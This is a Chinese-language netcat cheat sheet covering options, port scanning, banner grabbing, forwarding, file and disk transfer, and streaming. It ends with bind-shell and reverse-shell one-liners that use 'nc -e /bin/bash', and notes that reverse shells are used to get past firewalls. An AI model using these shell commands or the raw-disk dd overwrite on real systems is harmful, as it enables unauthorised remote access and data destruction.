用法连接到位于任何地方的主机$ nc [options] [host] [port]监听传入连接$ nc -lp port [host] [port]选项示例-hnc -h帮助-znc -z 192.168.1.9 1-100端口扫描主机或 IP 地址-vnc -zv 192.168.1.9 1-100提供详细输出-nnc -zn 192.168.1.9 1-100通过禁用 DNS 解析进行快速扫描-lnc -lp 8000TCP 侦听模式 (用于入站连接)-wnc -w 180 192.168.1.9 8000定义超时值-knc -kl 8000断线后继续收听-unc -u 192.168.1.9 8000使用 UDP 而不是 TCP-qnc -q 1 192.168.1.9 8000客户在 EOF 后熬夜-4nc -4 -l 8000仅限 IPv4-6nc -6 -l 8000仅限 IPv6聊天客户端-服务器服务器 Server (192.168.1.9)$ nc -lv 8000客户端 Client$ nc 192.168.1.9 8000Netcat 示例Banner 抓取$ nc website.com 80GET index.html HTTP/1.1HEAD / HTTP/1.1或者echo "" | nc -zv -wl 192.168.1.1 801-805端口扫描扫描 21 到 25 之间的端口$ nc -zvn 192.168.1.1 21-25扫描端口 22、3306 和 8080$ nc -zvn 192.168.1.1 22 3306 8080代理和端口转发$ nc -lp 8001 -c "nc 127.0.0.1 8000"或者$ nc -l 8001 | nc 127.0.0.1 8000创建从一个本地端口到另一个本地端口的隧道下载文件服务器 Server (192.168.1.9)$ nc -lv 8000 $ nc -nv 192.168.1.9 8000 > file.txt假设您想将文件 file.txt 从服务器 A 传输到客户端 B。上传文件服务器 Server (192.168.1.9)$ nc -lv 8000 > file.txt客户端 Client$ nc 192.168.1.9 8000 目录传输服务器 Server (192.168.1.9)$ tar -cvf – dir_name | nc -l 8000客户端 Client$ nc -n 192.168.1.9 8000 | tar -xvf -假设您想通过网络将目录从 A 传输到 B加密传输服务器 Server (192.168.1.9)$ nc -l 8000 | openssl enc -d -des3 -pass pass:password > file.txt客户端 Client$ openssl enc -des3 -pass pass:password | nc 192.168.1.9 8000在通过网络传输之前加密数据克隆服务器 Server (192.168.1.9)$ dd if=/dev/sda | nc -l 8000客户端 Client$ nc -n 192.168.1.9 8000 | dd of=/dev/sda克隆 linux PC 非常简单。假设你的系统盘是 /dev/sda视频流服务器 Server (192.168.1.9)$ cat video.avi | nc -l 8000客户端 Client$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -使用 netcat 流式传输视频远程 shell服务器 Server (192.168.1.9)$ nc -lv 8000 -e /bin/bash客户端 Client$ nc 192.168.1.9 8000我们已经使用 telnet 和 ssh 使用远程 Shell，但是如果它们没有安装并且我们没有安装它们的权限，那么我们也可以使用 netcat 创建远程 shell逆转 shell服务器 Server (192.168.1.9)$ nc -lv 8000客户端 Client$ nc 192.168.1.9 8000 -v -e /bin/bash反向 shell 通常用于绕过防火墙限制，例如阻止入站连接